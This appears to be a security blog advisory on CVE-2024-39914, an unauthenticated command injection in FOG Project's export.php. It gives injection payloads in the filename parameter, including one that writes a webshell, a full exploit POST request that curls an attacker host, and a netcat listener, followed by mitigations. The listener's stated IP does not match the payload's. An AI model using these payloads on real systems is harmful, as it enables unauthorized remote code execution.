Close Menu
    Ethical Hacking & Penetration Testing

    CVE-2024-39914 – Unauthenticated Command Injection in FOG Project’s export.php

    HackWatchitBy No Comments2 Mins Read
    CVE-2024-39914 – Unauthenticated Command Injection in FOG Project's export.php

    CVE-2024-39914 is a critical unauthenticated command injection vulnerability in FOG Project version ≤ 1.5.10.34. The flaw exists in how the filename parameter is processed by export.php, allowing attackers to inject arbitrary system commands. This can be used for immediate command execution or to drop a persistent PHP webshell for follow-up exploitation.

    • CVE ID: CVE-2024-39914
    • Severity: Critical
    • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
    • EPSS Score: 92.67%
    • Affected Versions: ≤ 1.5.10.34
    • Patched Version: 1.5.10.35
    • Authentication Required: No

    Impact: Remote Command Execution

    Technical Breakdown

    The export.php script within the fog/management/ directory includes logic that passes the filename parameter to a backend system command, likely using shell_exec() or similar unsanitized execution.

    An attacker can inject system commands inside the filename parameter, for example:

    filename=$(id)

    This leads to immediate execution of id on the server. Additionally, attackers can write arbitrary content (e.g., a webshell) into a file on the server:

    filename=$(echo '' > WEBSHELL)

    The resulting file (WEBSHELL) can then be accessed remotely to execute further OS commands.

    Conditions for Exploitation

    • FOG server must be network accessible
    • No login or session is required
    • Web server user must have write access to the web directory
    • PHP execution is enabled under /fog/management/

    Exploitation Steps

    To exploit this, inject a system command in the filename parameter to achieve unauthenticated RCE.

    Step 1: Send Malicious POST Request

    POST /fog/management/export.php?filename=$(curl+192.168.100.8)&type=pdf HTTP/1.1  
Host: 192.168.15.5  
Content-Length: 21  
User-Agent: ToxicPotato  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  

fogguiuser=fog&nojson=2

    Step 2: Monitor the Attacker Server

    On the attacking machine (e.g., 192.167.100.1), listen for incoming requests:

    ┌──(kali㉿kali)-[~]
└─$ nc -lvnp 80
Connection from 192.168.15.5:49802
GET / HTTP/1.1

    Mitigation

    • Upgrade to FOG Project 1.5.10.35 or later, where input validation and shell execution logic has been corrected
    • Restrict access to /fog/management/ from public networks
    • Apply input validation and disallow shell execution from user-supplied parameters
    • Use a WAF to detect command injection patterns ($(), ;, |, etc.)
    • Disable PHP execution in upload/export directories if possible

    References

    Share.

    Related Posts

    Comments are closed.